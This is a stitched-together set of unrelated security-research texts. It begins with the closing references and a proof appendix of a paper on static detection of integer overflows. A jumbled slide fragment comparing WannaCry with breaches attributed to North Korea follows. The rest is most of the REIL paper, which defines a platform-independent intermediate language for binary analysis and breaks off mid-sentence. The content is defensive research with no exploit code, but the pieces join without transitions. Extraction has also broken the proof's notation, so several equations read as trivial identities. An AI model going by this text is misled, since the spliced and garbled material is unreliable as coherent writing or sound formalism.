specific execution filtering for exploit prevention on commod-
ity software. In NDSS , 2006.
[25] R. Perdisci, W. Lee, and N. Feamster. Behavioral clustering of
http-based malware and signature generation using malicious
network traces. In Proceedings of the 7th USENIX conference
on Networked systems design and implementation , NSDI’10.
USENIX Association, 2010.
[26] W. Robertson, G. Vigna, C. Kruegel, and R. A. Kemmerer.
Using generalization and characterization techniques in the
anomaly-based detection of web attacks. In Proceedings of the
13 th Symposium on Network and Distributed System Security
(NDSS) , 2006.
[27] D. Sarkar, M. Jagannathan, J. Thiagarajan, and R. Venkata-
pathy. Flow-insensitive static analysis for detecting integer
anomalies in programs. In IASTED , 2007.
[28] R. Seacord. The CERT C secure coding standard . Addison-
Wesley Professional, 2008.
[29] W. Tielei, W. Tao, L. Zhiqiang, and Z. Wei. IntScope: Au-
tomatically Detecting Integer Overflow Vulnerability In X86
Binary Using Symbolic Execution. In 16th Annual Network
& Distributed System Security Symposium , 2009.
[30] F. Valeur, D. Mutz, and G. Vigna. A learning-based approach
to the detection of sql attacks. In DIMVA 2005 , 2005.
[31] K. Wang and S. J. Stolfo. Anomalous payload-based network
intrusion detection. In RAID , 2004.
[32] X. Wang, H. Chen, Z. Jia, N. Zeldovich, and M. Kaashoek.
Improving integer security for systems with kint. In OSDI .
USENIX Association, 2012.
[33] X. Wang, Z. Li, J. Xu, M. K. Reiter, C. Kil, and J. Y . Choi.
Packet vaccine: black-box exploit detection and signature gen-
eration. CCS ’06. ACM, 2006.
[34] C. Zhang, T. Wang, T. Wei, Y . Chen, and W. Zou. Intpatch:
Automatically fix integer-overflow-to-buffer-overflow vulner-ability at compile-time. Computer Security–ESORICS 2010 ,
pages 71–86, 2010.
A. Proof Sketch of the Relationship between
the Original Semantics and the Abstract
Semantics
A.1 The Alias Analyses and the Abstract Semantics
In order to prove the above relationship between the origi-
nal semantics and the abstract semantics, we introduce the
following lemma that states the property between alias rela-
tionships and the abstract semantics.
Lemma 5. Given an execution trace ⟨s0,σ0,ς0, ̄h0⟩−→a
⟨s1,σ1,ς1, ̄h1⟩−→a···in the abstract semantics, we have
∀i,first (si)=l,left (si)=“l:∗p=x”∀j,i<j∀lload∈LoadLabel
(¬no_alias (l,lload)
∧(∀i<k<j,first (sk)∈StoreLabel :¬must _alias (first (sk),lload))
→((σi(x),ςi(x))∈ ̄hj(lload))).
(3)
The intuition of Condition 3 is that σi(x)andςi(x)are
the integer value and the overflow flag of the variable xthat
the corresponding store statement of the label laccesses. If
the store statement and the corresponding load statement of
the labellloadmay access the same memory location and all
later store statements in the execution trace until the state
⟨sj,σj,ςj, ̄hj⟩do not have must _alias relationship with
the load statement, then the pair of the integer value and the
overflow flag (σi(x),ςi(x))should be in  ̄hj(lload).
Proof. We can prove Condition 3 with the induction on the
number of steps of the execution n.
Whenn= 0, the condition trivially holds. Now con-
sider the induction case where n > 0. Iffirst (sn−1)/∈
StoreLabel , then based on the small step rules of seman-
tics, ̄hn−1= ̄hn. It is straintforward to apply the induction
rule to prove the condition.
Iffirst (sn−1)∈StoreLabel andsn−1= “l:∗p′=
x′”, based on the induction, what we need to prove is the
case wherej=n:
∀i,first (si)=l,left (si)=“l:∗p=x”,i<n
∀lload∈LoadLabel (¬no_alias (l,lload)∧
(∀i<k<n,first (sk)∈StoreLabel :¬must _alias (first (sk),lload))
→((σi(x),ςi(x))∈ ̄hn(lload)))
Ifi=n−1, from the small step rule of the ab-
stract semantics of the store statement, we can prove that
∀lload∈LoadLabel (¬no_alias (l,lload))→((σi(x),ςi(x))∈
 ̄hn(lload)). Therefore the conditon holds.
Ifi < n−1, from the small step rule
of the store statement we can prove that
∀lload∈LoadStatement (¬must _alias (first (sn−1),lload))→
19 2013/8/5
( ̄hn−1(lload)⊆ ̄hn(lload)). From the induction rule, we can
show that (σi(x),ςi(x))∈ ̄hn−1(lload). Therefore, we can
prove the condition holds.
A.2 The Relationship between the Original Semantics
and the Abstract Semantics
Theorem 2. Given any execution trace in the original se-
mantics
⟨s0,σ0,ρ0,ς0,ρ0⟩−→⟨s1,σ1,ρ1,ς1,ρ1⟩−→···,
there is an execution trace in the abstract semantics
⟨s0,σ0,ς0, ̄h0⟩−→a⟨s1,σ1,ς1, ̄h1⟩−→a...
such that the following conditions hold
∀i∀x∈Var
(σi(x)∈Int→(σi(x) =σi(x)∧ςi(x) =ςi(x)))(1)
∀i,first (si)=l,l∈LoadLabel,left (si)=“l:x=∗p”
(ρi(σi(p))∈Int→(ρi(σi(p)),ρi(σi(p)))∈ ̄hi(l))(2)
whereleft(s)denotes an utility function that returns the
leftmost statement in sifsis a sequential composite and
returnssifsis not a sequential composite.
Proof. The proof of Conditions 1, 2 can be done with induc-
tion on the number of steps in the execution trace n.
For the base case n= 0, we simply verify that initial
states satisfy Conditions 1 2.
For the induction case n > 0, we already have
σ0,...,σn−1,ς0,...,ςn−1, ̄h0,...,  ̄hn−1that satisfy the
conditions by the induction rule. We first construct σn,ςn,
and ̄hnusing the corresponding small step rule in abstract
semantics, and then prove the construction satisfies the con-
ditions.
Condition 1: Iffirst (sn−1)/∈LoadLabel , the proof
is straightforward. For example, if first (sn−1) =l,
left(sn−1) = “l:x=yopz ”, based on the small step
rule of the original semantics we know that:
σn=σn−1[x→σn−1(y)opσn−1(z)]
ςn=ςn−1[x→ςn−1(y)∨ςn−1(z)∨
overflow (σn−1(y),σn−1(z),op)]
and we can construct using the corresponding rule in the
abstract semantics:
σn=σn−1[x→σn−1(y)opσn−1(z)]
ςn=ςn−1[x→ςn−1(y)∨ςn−1(z)∨
overflow (σn−1(y),σn−1(z),op)]
By the induction rule we have ∀v∈Varσn−1(v)∈Int→
σn−1(v) =σn−1(v), so it is easy to show that:
∀v∈Var,v̸=xσn(x)∈Int→σn(x) =σn(x)Also consider
σn(x)∈Int→
(σn−1(y)∈Int∧σn−1(z)∈Int)→
(σn−1(y) =σn−1(y)∧σn−1(z) =σn−1(z))→
((σn−1(y)opσn−1(z)) = (σn−1(y)opσn−1(z)))→
(σn(x) =σn(x))
We can do the proof similarly for ςandς. Therefore
Condition 1 holds.
Iffirst (sn−1)∈LoadLabel andleft(sn−1) = “l:x=
∗p”, based on the semantic rules of the load statement, we
know that:
σn=σn−1[x→ρn−1(σn−1(p))]
ςn=ςn−1[x→ρn−1(σn−1(p))]
From the induction rule of Condition 2,
we know that: ρn−1(σn−1(p))∈ Int→
(ρn−1(σn−1(p)),ρn−1(σn−1(p)))∈ ̄h(l). Therefore,
ifρn−1(σn−1(p))∈Int, it is possible to construct σnand
ςmas follows based on the abstract semantic rule of the load
statement:
σn=σn−1[x→ρn−1(σn−1(p))]
ςn=ςn−1[x→ρn−1(σn−1(p))]
From the induction rule of Condition 1, we know that
σn−1=σn−1andςn−1=ςn−1. These facts together are
enough to show that Condition 1 holds.
Condition 2: Iffirst (sn)/∈LoadLabel , the proof is trivial
by using induction rule. Next we are going to sketch the
proof of Condition 2, when first (sn)∈LoadLabel and
left(sn) = “l:x=∗p”.
We try to find a program state ⟨sm,σm,ςm,ρm,ρm⟩in
prior execution steps, such that m < n ,first (sm) =l′,
left(sm) = “l′:∗p′=x′”,σm(p′) =σn(p), and
∀m<k<n,left (sk)=“∗p′′=x′′”:σk(p′′)̸=σn(p)
Intuitively, the left(sm)is the latest store statement that
acesses the memory location p. Therefore, the load state-
mentleft(sn)should obtain the value that left(sm)stores.
We can use a simple induction on the original small step
semantics to prove that: 1) if we cannot find such inter-
mediate state, we can prove that ρn(σn(p))/∈Int; 2) or
σm(x′) =ρn(σn(p))andςm(x′) =ρn(σn(p)).
Then with the soundness property def-
inition of alias predicate must _alias and
no_alias , we prove that ¬no_alias (l′,l)and
∀m<k<n,first (sk)∈StoreLabel¬must _alias (first (sk),l).
Therefore, as a direct implication of Condition 3, we
know that (σm(x′),ςm(x′))∈ ̄hn(sn). With Condi-
tion 1 we have proved, we get (σm(x′)∈Int)→
((σm(x′),ςm(x′))∈ ̄hn(sn)). Therefore, we have
ρn(σn(p))∈Int→(ρn(σn(p)),ρn(σn(p)))∈ ̄hn(sn).
Condition 2 holds.
20 2013/8/5
Similar with network communication protocol function  Comparison of “WannaCry" malware with North Korea's malware  
Related to SWIFT Hack  
(Feb 2015) by North Korea  WannaCry  
(Feb 2017) by ?  South Korea’s Media Hack  
(Jun 2013) by North Korea  
Sony Pictures Hack  
(Nov 2014) by North Korea  Vietnam Bank Hack  
(Dec 2015) by North Korea  Bangladesh Bank Hack  
(Feb 2016) by North Korea  
Similar with Wipe -out function  ellipsis  Removed  
Modularized  REIL: Aplatform-independent intermediate representation
of disassembled code forstaticcode analysis
ThomasDullien
zynamics GmbH
Bochum, Germany
thomas.dullien@zynamics.comSebastianPorst
zynamics GmbH
Bochum, Germany
sebastian.porst@zynamics.com
ABSTRACT
In this paper we introduce REIL (Reverse Engineering In-
termediate Language), a platform-independent intermediate
language to represent disassembled assembly code. We cre-
ated the REIL language specifically to simplify and auto-
mate static code analysis of assembly code in the context
of software reverse engineering for the purpose of security
auditing and vulnerability detection.
This paper introduces the complete REIL language with
all of its instructions as well as the virtual REIL architec-
ture that defines the effects of REIL instructions on registers
and memory. Furthermore we discuss the reasons why we
designed the REIL language the way we did, what limita-
tions the user of the language should be aware of, and what
we have planned for REIL in the future.
Keywords
REIL, Reverse Engineering Intermediate Language, Static
Code Analysis, Disassembly, Intermediate Representation,
Intermediate Language Recovery
1. INTRODUCTION
Only a few years ago the main exposure people had to
security-critical computer programs like credit card stealing
malware came through their home computers. Due to the
dominance of Microsoft’s operating system Windows these
computers were nearly always computers of the x86 family.
This situation changed. People today come in contact with
more and more computer architectures that are directly or
indirectly relevant to the safety of their private data. Ex-
amples include appliances like modern cell phones, network
printers with integrated web servers and hard drives, and
more complex routers or wireless devices that are now part
of many home networks.
On the side of the security researchers this led to a diver-
sification of target architectures that need to be analyzed.
Of course there is still the x86 platform which is the bread
and butter of many security researchers but other devices
Permission to make digital or hard copies of all or part of this w ork for
personal or classroom use is granted without fee provided th at copies are
not made or distributed for profit or commercial advantage and th at copies
bearthisnoticeandthefullcitationonthefirstpage. Tocop yotherwise, to
republish,topostonserversortoredistributetolists,re quirespriorspecific
permission and/orafee.
CanSecWest 2009Vancouver,Canada
Copyright2009zynamics GmbH.use different CPUs. In the mobile world ARM is the most
popular architecture, while network appliances like routers
often use PowerPC CPUs. MIPS is also making a comeback
in wireless devices and some high-end routers.
For a typical security research and consulting company
that wants to diversify its product palette this creates a need
to have tools that can work on assembly code of several dif-
ferent platforms. Here is where our contribution comes in.
We developed an analysis language called REIL (Reverse
Engineering Intermediate Language) that abstracts from na-
tive assembly code and therefore makes it possible to develop
analysis tools and algorithms that work on many different
platforms.
One thing that sets REIL apart from other proposed anal-
ysis languages is that REIL is not just a prototype language.
A REIL implementation was already shipped in a commer-
cial reverse engineering tool (BinNavi) where it has proven
to be very valuable in developing new static analysis algo-
rithms in real-world software analysis scenarios.
2. THEREILINSTRUCTIONSET
One of the most important advantages of the REIL lan-
guage is its very reduced instruction set. REIL knows only
17 different instructions. This distinguishes REIL signifi-
cantly from all popular instruction sets supported by real
CPUs today. For example, the x86 instruction set including
all of its modern extensions contains more than 600 instruc-
tions. The PowerPC instruction set including all simplified
mnemonics contains more than 1000 instructions1. The re-
duction to a core minimum of REIL instructions was delib-
erately chosen to make it as easy as possible to write static
analysis algorithms for REIL code. The idea behind this is
that fewer instructions in an assembly language mean fewer
different transformations of program state that must be con-
sidered in a static analysis algorithm.
Another advantage of REIL instructions over instructions
of common architectures is the single-responsibility aspect
of all REIL instructions. Typical instructions of real archi-
tectures often have many different responsibilities. A sin-
gle x86 instruction can load a value from memory, perform
some kind of computation on it, and set flags according to
the result of the computation. In REIL this is not possi-
ble. Every instruction has exactly one effect on the program
state. Either it loads a value from memory, or it performs a
1Simplified mnemonics are relevant here because in nearly
all cases where binary programs are disassembled for secu-
rity analysis, industry standard disassemblers like IDA Pro
generate simplified mnemonics.
computation on a value, or it sets a single flag. This makes
it very easy for the user of REIL code to understand what
exactly is going on in a REIL instruction. Non-obvious side-
effects that require a deep understanding of the underlying
instruction set can never happen.
The operands of REIL instructions are also very regu-
lar. Each REIL instruction has exactly three operands. The
first two operands of a REIL instruction are in all cases in-
put operands which are never modified by the instruction.
The third operand is generally the output operand of the in-
struction. This operand stores the result of the computation
performed by the instruction2. Not all instructions need to
have three different operands. The most obvious example is
the no-operation instruction NOP which does not need to
have any operand. Nevertheless, the REIL instruction NOP
still has three different operands of type Empty .
Except for Empty , there are only three more types of REIL
instruction operands. Operands can be integer literals, reg-
isters, or subaddresses. Of those three operand types, inte-
ger literals are the simplest type. Operands of this type are
typically used when a constant integer value like 5 or 4379
is required as part of the computation of a more complex
result. Since integer literals are read-only they can never be
used as output operands of REIL instructions.
Registers are the second type of REIL operands. REIL
registers work exactly like native general-purpose CPU reg-
isters. They can hold integer values and they are mutable,
meaning the value they hold can be changed.
In fact, while most registers used in REIL instructions are
pure REIL registers of the form t <number> (e.g. t 0, t1, ...
, t123, ...), native registers from the source architecture of
an analyzed program can also show up as operands of REIL
instructions. This does not limit the platform-independence
of REIL code as REIL registers and source architecture reg-
isters are treated completely uniformly in REIL analysis al-
gorithms. Native registers are simply used in REIL code to
make it easier to liken the results of an analysis algorithm
back to the original input code.
The last REIL instruction operand type is the subaddress.
Operands of this type are comparable to integer literals but
instead of integral values these operands always hold ad-
dresses of REIL instructions. Furthermore, this operand
type can only appear as the third operand of JCC (condi-
tional jump) instructions. Operands of this type are only
generated when an original native assembly instruction is
translated into a series of REIL instructions that contains
branches from decisions or loops. Examples for such instruc-
tions are the prefixed string operations (rep stos, ...) of the
x86 instruction set which are translated to REIL instructions
that form a loop.
Except for their type and their value, REIL operands are
characterized by their size. This size is equal to the max-
imum size of its operand value. REIL operand sizes have
names like b1,b2,b4and so on meaning that the size of the
operand is 1 byte, 2 bytes, and 4 bytes respectively. For
example, the integer literal operand 0x17/ b2is really two
bytes large and could also be represented as 0x0017 b2while
the size of the register t 0in the operand t 0/b4is 32 bits.
In addition to its operands, all REIL instructions can come
with so-called meta-data. This meta-data is simply a map
of key-value pairs that give additional information about an
2The one exception is the jump instruction JCC where the
third operand is the jump target.instruction that is probably important during static code
analysis. In general, the number of pieces of meta-data as-
sociated with an instruction is not limited but in practice
most REIL instructions do not have any meta-data at all
associated with them.
In the current version of REIL there is only one kind of
meta-data. Jump instructions that were generated during
the translation of a subfunction call (like callon the x86
CPU or blon PowerPC) are specifically marked with the
keyisCall and the value true. This is necessary because
subfunction calls need to be treated very differently than
conditional jumps during many static code analysis algo-
rithms.
The 17 different REIL instructions can be grouped into a
few different instructions groups. The biggest group are the
arithmetic instructions like addition and subtraction. Then
there are the bitwise instructions that perform operations
like bitwise OR and AND, the conditional instructions that
are used to compare values and jump according to the re-
sult of the comparison, the data transfer instructions that
access REIL memory and transfer the content of registers,
and the remaining instructions which do not really fall into
any group.
2.1 The arithmeticinstructions
With six members, the group of arithmetic instructions
covers more than one third of the total instructions of the
REIL instruction set.
•ADD: Addition of two values
•SUB: Subtraction of two values
•MUL: Unsigned multiplication of two values
•DIV: Unsigned division of two values
•MOD: Unsigned modulo of two values
•BSH: Logical shift operation
ADD and SUB work exactly like standard addition and
subtraction on most platforms.
The multiplicative instructions MUL, DIV, and MOD in-
terpret all of their input operands in an unsigned way. The
REIL instruction set does not contain signed counterparts of
these instructions because signed multiplication and division
can easily be simulated in terms of unsigned multiplication
and division.
The logical shift operation can either be used as a left
shift or a right shift, depending on the sign of its second
operand. If the second operand is positive, the shift oper-
ation is a left-shift. If it is negative, the shift operation is
a right-shift. Arithmetic shifts do not exist in the REIL
instruction set because arithmetic shifts can easily be simu-
lated with the help of logical shifts. Like in the case of the
multiplicative instructions, keeping the REIL instruction se t
small was more important than adding the convenience of
having more epxressive REIL translations.
Figure 1 shows examples of all arithmetic instructions.
The structure of all arithmetic instructions is the same. The
first two operands are the input operands of the operation
while the third operand is the output operand where the
result of the operation is stored. The order of the input
operands is the natural order that is generally used when
writing down the operations in infix notation on paper or
in the source code of computer programs. For example, the
first operand of the SUB operation is the minuend while the
second operand is the subtrahend. In the DIV operation the
first operand is the dividend and the second operand is the
divisor.
ADDt0/b4,t1/b4,t2/b8
SUBt7/b4,t9/b4,t12/b8
MULt8/b4,4/b4,t9/b8
DIV4000/b4,t2/b4,t3/b4
MODt8/b4,8/b4,t4/b4
BSHt1/b4,2/b4,t2/b8
Figure 1: Examples of the arithmetic REIL instruc-
tions
Another important aspect of REIL is first shown in fig-
ure 1 too. Potential overflows in the results of operations
are handled explicitly. If an operation can overflow, the
output operand must be large enough to store the whole
result including the overflow. This is the reason why the
output operands of the example instructions are twice as
large as their input operands3. The two exceptions are the
output operands of the DIV and MOD instructions. Since
the results of these operations can never be larger than the
first input operand, an extension of the size of the output
operand is not necessary. The output operand has the size
of the input operand instead.
The explicit handling of overflow is an important differ-
ence to real architectures where overflows produced by op-
erations are nearly always cut off because of the fixed size
of native CPU registers. This explicit overflow handling is
what enables REIL algorithms to analyze the results of op-
erations in bigger detail when the exact overflowing value
of a register might be important instead of simply having a
flag that signals that an operation produced an overflow.
2.2 The bitwise instructions
The next biggest instruction group is the group formed by
the three bitwise instructions.
•AND: Bitwise AND of two values
•OR: Bitwise OR of two values
•XOR: Bitwise XOR of two values
The three bitwise instructions work exactly like one ex-
pects bitwise instructions to work. Bit for bit they connect
the bits of two input operands according to the truth ta-
ble defined for their operation. The calculated value is then
written to the output operand of the instruction.
A bitwise NOT instruction is not part of the REIL in-
struction set because NOT is equivalent to XOR-ing a value
with a value of equal size and all bits set. That means to
calculate the one’s complement of the 16-bit value 0x1234
one would XOR it with the 16-bit value 0xFFFF.
3The result operand of addition and subtraction is techni-
cally too large because these operations performed on two
32-bit values can only overflow into the 33rd bit; however
there is no 33-bit REIL operand size so the next biggest
operand size (64-bit) was chosen.ANDt0/b4,t1/b4,t2/b4
ORt7/b4,t9/b4,t12/b4
XORt8/b4,4/b4,t9/b4
Figure 2: Examples of the bitwise REIL instructions
Figure 2 shows examples of all bitwise instructions. Their
general structure equals the structure of the arithmetic in-
structions. Like them, bitwise instructions take two input
operands and store the result of the operation in the out-
put operand. One important difference is that none of the
bitwise instructions produce an overflow. An explicit mod-
eling of overflowing values and an extension of the size of
the output operand are therefore not necessary.
2.3 Data transfer instructions
To access the REIL memory, two different REIL instruc-
tions are needed. One is used for loading a value of arbitrary
size from the REIL memory while the other one is used to
store a value of arbitrary size to the REIL memory. Fur-
thermore, this group of instructions contains an instruction
that is used to transfer values into registers.
•LDM: Load a value from memory
•STM: Store a value to memory
•STR: Store a value in a register
The first operand of the LDM instruction contains the
address of the REIL memory where the value is loaded from.
This operand can either be an integer literal or a register.
When the instruction is executed, it loads the value from
the given memory address and stores it in the third operand
of the instruction. The size of the value that is loaded from
memory equals the size of the third operand. If the size of
the third operand is a 32-bit register, a 32-bit value is loaded
from memory. As the loaded value is written to the third
operand, the third operand must be a register.
The store operation STM is the inverse operation to the
load operation LDM. It can be used to store a value of ar-
bitrary size to memory. The first operand of the STM in-
struction is the value to be stored in memory. Its size de-
termines how many bytes are written to memory when the
STM instruction is executed. The third operand specifies
the address where the value of the first operand is written
to. Both operands can be either integer literals or registers.
The second operand is unused.
The STR instruction is one of the simplest instructions of
the REIL instruction set. It copies a value to the output
register specified in the instruction. The input operand can
be either a literal (to load a register with a constant) or
another register (to transfer the content of one register to
another register).
LDM 413800/b4, ,t1/b2
STR t1/b2, ,t2/b2
STM t2/b2, ,415280/b4
Figure 3: Examples of the data transfer REIL in-
structions
Figure 3 shows a sequence of data transfer instructions
that load a value from memory, copy it to another register,
and store it back to another address in memory. Since the
size of the output register of LDM instructions specifies how
many bytes are loaded from memory, it is clear that two
bytes are loaded from memory. The size of the two used
operands of STR instructions is typically the same as STR
only copies a value. In the end the two-byte register t2is
stored back to memory.
2.4 Conditional instructions
The group of conditional instructions is used to compare
values and depending on the results of the comparison to
jump to one REIL instruction or another.
•BISZ: Compare a value to zero
•JCC: Conditional jump
The BISZ instruction is the only instruction of the REIL
instruction set that can be used to compare two values. In
fact, it can only be used to compare a single value to zero
but this is sufficient to emulate any kind of more complex
comparison. The BISZ instruction takes a single operand,
compares it to zero, and depending on the value of the input
operand, the output operand is set to 0 (if the value of the
input operand was not 0) or 1 (if the value of the input
operand was 0).
The conditional jump instruction JCC is typically used to
process the results of a BISZ instruction. If the first operand
of the JCC instruction evaluates to 0, the jump is not taken.
If the first operand evaluates to any other value than zero,
the jump is taken and control is transferred to the address
(or sub-address) specified in the third operand.
An unconditional jump is not part of the REIL instruction
set because it is possible to emulate an unconditional jump
using a conditional jump by setting the first operand of the
conditional jump to the integer literal 1 (or any other non-
zero integer literal).
BISZ t0/b4, ,t1/b1
JCC t1/b1, ,401000/b4
Figure 4: Examples of the conditional REIL instruc-
tions
Figure 4 shows a typical sequence of a single BISZ instruc-
tion followed by a JCC instruction that uses the output of
the BISZ instruction to determine whether to take a jump to
the address specified in its third operand. Since the output
of BISZ instructions is always either 0 or 1, the size of the
output operand of BISZ instructions is always b1.
2.5 Other instructions
There are a few other instructions which do not really
belong to any group at all.
•UNDEF: Undefines a value
•UNKN: Unknown source instruction
•NOP: No operation
The UNDEF instruction undefines the value of a register.
This means that once the UNDEF instruction is executed,
the value inside the undefined register is unknown. This
is important because there are native assembly instructionswhich leave registers or flags in an undefined state. The x86
instruction DIV, for example, leaves a number of flags like
the zero flag and the carry flag in an undefined state.
The UNKN instruction is kind of a placeholder instruc-
tion. It indicates that during the REIL code generation an
original assembly instruction was encountered that could not
be translated.
The NOP instruction does nothing. Nevertheless it is not
useless. REIL translators can generate this instruction to
pad control flow in certain edge cases. In a few situations
this is very useful because it keeps REIL translators very
simple. Without the existence of the NOP instruction, the
REIL translator would have to look ahead to the next native
instruction to generate correct REIL code4.
UNDEF , , t1/b4
UNKN , ,
NOP , ,
Figure 5: Examples of other REIL instructions
Figure 5 shows examples of the remaining REIL instruc-
tions. The only instruction that takes operands is the UN-
DEF instruction which undefines a register.
3. THEREILARCHITECTURE
The definition of the REIL language includes the descrip-
tion of the REIL architecture and the definition of a virtual
machine that can be used to execute the generated REIL
code.
The REIL architecture is a simple register-based architec-
ture without an explicit stack. The number of registers avail-
able in REIL code is unlimited. As previously explained,
the names of REIL registers have the form t <number> . The
index number of register names is unbounded. There is fur-
thermore no requirement that all REIL registers between t 0
and t n−1are used by a given program that uses n different
registers. A program that uses exactly three REIL registers
can use t 7, t799, and t 3199if desired.
REIL registers themselves do not have a fixed width or
a limited width. The size of REIL registers is always equal
to the size of the operands where they are used. The size
of REIL registers can even change between instructions. In
one instruction register t ncan have size b swhile in another
instruction it can have size b t. Since operands can grow
arbitrarily large, REIL registers can also grow arbitrarily
large. In practice we have not yet encountered registers with
more than 128 bits (equivalent to b 16) though.
We already mentioned that registers of the original input
code can appear in REIL code. In fact, the registers of
the original architecture will always appear in REIL code to
make it possible to port results of REIL code analysis back
to the original code. This does not violate the platform-
independent nature of REIL code. REIL registers and native
registers can be mixed at will and be treated completely
uniformly. While analyzing REIL code there is no difference
between the registers t0,t1, andt2and the registers eax, ebx,
and ecx. At the end of an analysis algorithm one can then
easily distinguish between the REIL registers (which have
thetnform) and the native registers (which do not have the
4Technically, the NOP instruction could of course be re-
placed by an instruction like add 0, 0, t nthat also has no
discernible effect on the program state.
tnform) to port the values of relevant registers back to the
original assembly code.
The memory of the virtual REIL machine follows a flat
memory model. Unlike some real CPUs like the x86 which
has memory segments (in real mode) or at least memory se-
lectors (in protected mode), REIL memory starts at address
0 and can grow arbitrarily large. While there is technically
an infinite amount of storage available in REIL memory,
practical concerns of the source architecture limit the used
memory in practice. If the source assembly language (like
32 bit x86 assembly) can only address 4 GB of memory, only
4 GB of REIL memory will ever be accessed in REIL code
created from x86 programs. REIL memory higher than the
addressable memory range of the source target architecture
is never used.
Due to the flat memory model of the REIL memory, seg-
mented memory access of native architectures must be sim-
ulated in REIL programs if necessary. This can be done by
creating virtual segments which represent the memory seg-
ments of the native architecture. Since REIL memory is not
limited in size, there is enough space available to make these
virtual segments non-overlapping, meaning that memory ac-
cess through one segment of the native architecture never
interfers with memory access through another segment of
the native architecture.
The endianness of the source architecture must be con-
sidered too when accessing REIL memory. On native ar-
chitectures endianness falls into two different categories. In
some cases (like x86) native architectures have a fixed endi-
anness that can not be changed during runtime while other
architectures can switch the endianness of their memory ac-
cess at runtime by executing a special instruction (Pow-
erPC, ARM). In general, REIL does not have any mech-
anisms to deal with endianness. All endianness issues must
be handled by the REIL translators when generating the
REIL instructions that access memory. This poses a prob-
lem when endianness is switched at runtime because REIL
code is generated in advance and can not be updated any-
more when endianness-switching happens. However, the rar-
ity of endianness-switching makes this a special situation
that is seldomly relevant for security audits.
After REIL memory and the REIL registers are given an
initial state, REIL code can be analyzed or even executed.
Execution of REIL code happens just like program execu-
tion on a real CPU. Starting with the value in the program
counter register, REIL code is executed5. The REIL instruc-
tion at the position of the current program counter is fetched
and interpreted with regard to the current state of the REIL
register bank and the REIL memory. Once interpretation is
complete, the REIL register bank and the REIL memory are
updated to reflect the effects of the instruction on the global
state.
4. TRANSLATINGNATIVECODETOREIL
The translation of native assembly code to REIL code
is straightforward. For each supported native assembly lan-
guage there is a so called REIL translator. This REIL trans-
5There is no special REIL program counter register. Rather,
the program counter register of the input architecture is
used. This is important to make sure that at each step
of the REIL code analysis, the value of the program counter
register has the same value as it would have during a real
execution of the program on the source platform.lator takes a piece of native assembly code and translates it
to REIL code. Linearly iterating over all instructions in a
piece of input code, the translator translates each instruc-
tion to REIL code independently. The REIL translator does
not look ahead to see what instruction follows the current
instruction and it does not require information generated
during the translation of previous instructions. This state-
lessness of the translation makes REIL translators very sim-
ple. In fact, REIL translators are nothing but glorified maps
that repeatedly map a single native instruction to a list of
REIL instructions.
Due to the simplicity of REIL instructions and what they
can do in one step, a single native assembly instruction is
nearly always translated to many REIL instructions. Exper-
imental results have shown that on average, an original in-
struction is translated into approximately 20 REIL instruc-
tions while the most complex native instruction we found in
practice was translated to more than 50 REIL instructions.
This one-to-many relation between native instructions and
REIL instructions unfortunately destroys a direct correspon-
dence between the address of a native assembly instruction
and the addresses of the REIL instructions created for the
native assembly instruction. Having such a correspondence
would be most desirable because it would make it signif-
icantly simpler to port the results of a REIL analysis al-
gorithm back to the original assembly code. To solve this
problem, the addresses of REIL instructions are shifted to
the left by 8 bits (or multiplied by 0x100). This means that
the first REIL instruction that corresponds to the native as-
sembly instruction at offset n has the offset 0 x100∗nwhile
the second REIL instruction has the offset 0 x100∗n+1 and
so on. This address translation limits the translation of a
single native instruction to at most 256 different REIL in-
structions. Should it ever happen that more than 256 REIL
instructions are generated for a single native instruction, the
addresses of the REIL instructions would overflow into the
addresses of the REIL instructions of the following native
instruction.
5. LIMITATIONS OF REIL
There are a number of more or less significant issues that
might limit the use of REIL in practice. Some of these lim-
itations are built into the REIL language itself while others
exist simply because we have not yet had time to implement
certain aspects of native architectures.
The first limitation is that the REIL translators we have
so far (32-bit x86, 32-bit PowerPC, and 32-bit ARM) are
unable to translate certain classes of instructions. For ex-
ample, none of the translators can translate FPU instruc-
tions. CPU extensions like the MMX and SSE extensions
of x86 CPUs are also not translated yet. We have chosen
to skip the translation of these instructions because REIL is
supposed to be a language for analyzing assembly code for
security-critical bugs and vulnerabilities. FPU, MMX, and
SSE extensions are only very rarely involved in these kinds
of flaws. Should FPU bugs or other CPU extension bugs
become popular targets of software exploits in the future,
we can easily extend our existing translators to be able to
handle these instructions.
Like FPU instructions, privileged instructions like system
calls, interrupts, and other kernel-level instructions are not
translated by our current REIL translators. The justifica-
tion for the lack of support for these kinds of instructions
follows along the lines of the lack of FPU support. In our
initial implementation of REIL we wanted to focus on the
instructions that are most often involved in some kind of
security-relevant software flaws. Depending on the exact
effects of the missing privileged instructions, it might be
trivial to impossible to add them to the REIL language. An
instruction that has significant low-level effects on the under-
lying hardware, for example one that flushes the CPU cache,
will never be part of REIL for this would mean a complete
loss of platform-independence and/or a big increase in the
number of different instruction mnemonics. Other privileged
instructions like interrupt execution can often be simulated
using the features REIL already has.
REIL can also not deal with exceptions in a platform-
independent way. This means that at this point exceptions
and the corresponding stack unwinding can not be handled
by REIL. Due to the lack of exception handling common
situations that throw exceptions (dividing by zero, hitting
a breakpoint, ...) are simply ignored in the default REIL
interpreter.
The next limitation is that REIL can not handle self-
modifying code of any kind. This is simply because native
code is pre-translated instruction for instruction of a na-
tive function and the resulting REIL code is fixed after the
initial translation. The reason for this is that REIL instruc-
tions themselves do not reside in the REIL memory. They
can therefore not be overwritten and modified during the
interpretation of REIL code.
6. THE FUTUREOF REIL
The first and foremost goal of the next few months is to
write more REIL translators (for example to translate MIPS
code) and to implement more REIL-based code analysis al-
gorithms. Additionaly, we have a few minor ideas about
improving the quality of generated REIL code and its use-
fulness in static code analysis.
The first idea is the introduction of a bit-sized operand
typeb0. Right now the smallest operand type is the byte-
sized operand b1. During bit-width analysis it might be use-
ful to know that an operand that has size b1in current code
does not use any bits but its least significant bit. Extending
on this idea, maybe it would be smarter to give the size of
operands in bits instead of bytes.
An idea that can be used to improve the correctness of
REIL translation and certain analysis algorithms is the in-
troduction of two additional instructions, extend and reduce.
The motivation for these two instructions is simple. Right
now there are no limitations on how operand sizes can be
combined in one instruction. When generating an ADD in-
struction one input operand can have size b1while the sec-
ond input operand can have size b4. A rule that specifies
that the input operands of all instructions must be of equal
size would make REIL code more regular for analysis and
certain bugs classes in REIL translators can be checked for
automatically. The role of the extend instruction would be
to extend a value of a smaller size like b1to a larger size
likeb2orb4while keeping the value of the extended register
the same. The reduce instruction would be the opposite of
the extend instruction. Reduce would reduce the size of an
operand to a smaller operand size. In this case it can not be
